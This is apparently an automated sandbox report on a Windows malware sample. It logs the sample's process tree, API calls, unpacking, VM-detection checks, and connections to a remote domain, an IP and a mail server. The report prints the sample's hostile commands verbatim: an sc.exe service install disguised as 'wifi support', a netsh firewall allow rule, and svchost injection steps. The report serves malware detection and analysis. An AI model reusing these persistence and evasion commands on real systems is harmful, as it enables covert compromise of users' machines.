        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00129A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,23_2_00129A6B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: file.exeReversingLabs: Detection: 43%
        Source: file.exeVirustotal: Detection: 34%
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeug
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi supportJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conectionJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeugJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\qbxctmyn.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,0_2_00406A60
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9EA4 CreateToolhelp32Snapshot,Module32First,0_2_007B9EA4
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1500:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr
        Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20230208_040427_786.etl.22.dr
        Source: Binary string: *C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr

        Data Obfuscation

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeUnpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeUnpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BD18C push 0000002Bh; iretd 0_2_007BD192
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069

        Persistence and Installation Behavior

        barindex
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: unknownExecutable created and started: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\qbxctmyn.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\htdzdeugJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B

        Hooking and other Techniques for Hiding and Protection

        barindex
        Deletes itself after installation
        Source: C:\Windows\SysWOW64\svchost.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00401000
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_17-15661
        Source: C:\Users\user\Desktop\file.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-15297
        Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_23-6457
        Source: C:\Windows\SysWOW64\svchost.exe TID: 5100Thread sleep count: 93 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 5100Thread sleep time: -93000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_17-15014
        Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_23-7314
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15280
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-14862
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_17-14655
        Source: C:\Users\user\Desktop\file.exeAPI coverage: 5.5 %
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeAPI coverage: 3.8 %
        Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-14832
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvaded block: after key decisiongraph_17-14625
        Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decisiongraph_23-6127
        Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_23-7407
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,23_2_0012199C
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-15293
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeAPI call chain: ExitProcess graph end nodegraph_17-15025
        Source: svchost.exe, 00000014.00000002.531851789.0000027EFA7AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
        Source: svchost.exe, 00000014.00000002.531361159.0000027EF9E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware820ES
        Source: svchost.exe, 00000014.00000002.531851789.0000027EFA7AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
        Source: svchost.exe, 00000001.00000002.530944246.000001A573402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
        Source: svchost.exe, 00000014.00000002.531361159.0000027EF9E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware8
        Source: svchost.exe, 00000001.00000002.531072410.000001A573428000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.531375972.0000028763264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.531173272.0000021B36029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,0_2_00401D96
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9781 push dword ptr fs:[00000030h]0_2_007B9781
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0208092B mov eax, dword ptr fs:[00000030h]0_2_0208092B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02080D90 mov eax, dword ptr fs:[00000030h]0_2_02080D90
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00E3092B mov eax, dword ptr fs:[00000030h]17_2_00E3092B
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00E30D90 mov eax, dword ptr fs:[00000030h]17_2_00E30D90
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,0_2_0040EBCC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00129A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,23_2_00129A6B

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\svchost.exeDomain query: svartalfheim.top
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 176.124.192.220 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
        Allocates memory in foreign processes
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 120000 protect: page execute and read and writeJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 120000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 120000Jump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3D6008Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi supportJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conectionJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeugJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00406EDD
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,0_2_0040EC54
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,0_2_0040B211
